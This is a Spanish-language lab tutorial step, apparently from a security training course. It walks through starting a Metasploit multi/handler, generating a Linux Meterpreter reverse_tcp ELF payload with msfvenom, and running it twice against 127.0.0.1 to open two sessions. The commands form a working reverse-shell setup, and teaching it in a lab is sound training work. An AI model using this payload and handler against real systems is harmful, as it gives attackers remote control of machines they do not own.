Obtener múltiples sesiones de Meterpreter o shell
En este paso, configurará un listener en Metasploit y luego ejecutará un payload para crear dos sesiones de Meterpreter separadas. Esto simula la obtención de acceso a dos sistemas diferentes.
Primero, abra una terminal e inicie la consola de Metasploit Framework. La opción -q hace que se inicie silenciosamente, sin mostrar el banner.
msfconsole -q
A continuación, configuraremos un listener genérico, llamado multi/handler, para esperar conexiones entrantes.
use multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
Ahora, ejecute el listener como un trabajo en segundo plano utilizando la opción -j. Esto mantiene el prompt de msfconsole disponible para otros comandos mientras el listener se ejecuta en segundo plano.
run -j
Debería ver una confirmación de que el handler se ha iniciado.
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 127.0.0.1:4444
Ahora, necesita generar y ejecutar el payload que se conectará a este listener. Abra una nueva segunda pestaña de terminal haciendo clic en el icono + en la ventana de la terminal.
En esta nueva terminal, use msfvenom para crear un payload. Este comando genera un archivo ejecutable ELF que, cuando se ejecuta, se conectará a nuestro listener.
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o ~/project/payload.elf
Haga que el archivo de payload generado sea ejecutable:
chmod +x ~/project/payload.elf
Ahora, ejecute el payload dos veces para crear dos sesiones. Las ejecutamos como procesos en segundo plano (&) para que pueda ejecutar el comando nuevamente de inmediato.
./payload.elf &
./payload.elf &
Vuelva a su primera ventana de terminal con msfconsole. Verá mensajes que indican que se han abierto dos sesiones de Meterpreter.
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:38998) at 2023-10-27 10:30:00 -0400
[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:39000) at 2023-10-27 10:30:05 -0400
Ahora ha establecido con éxito dos sesiones activas.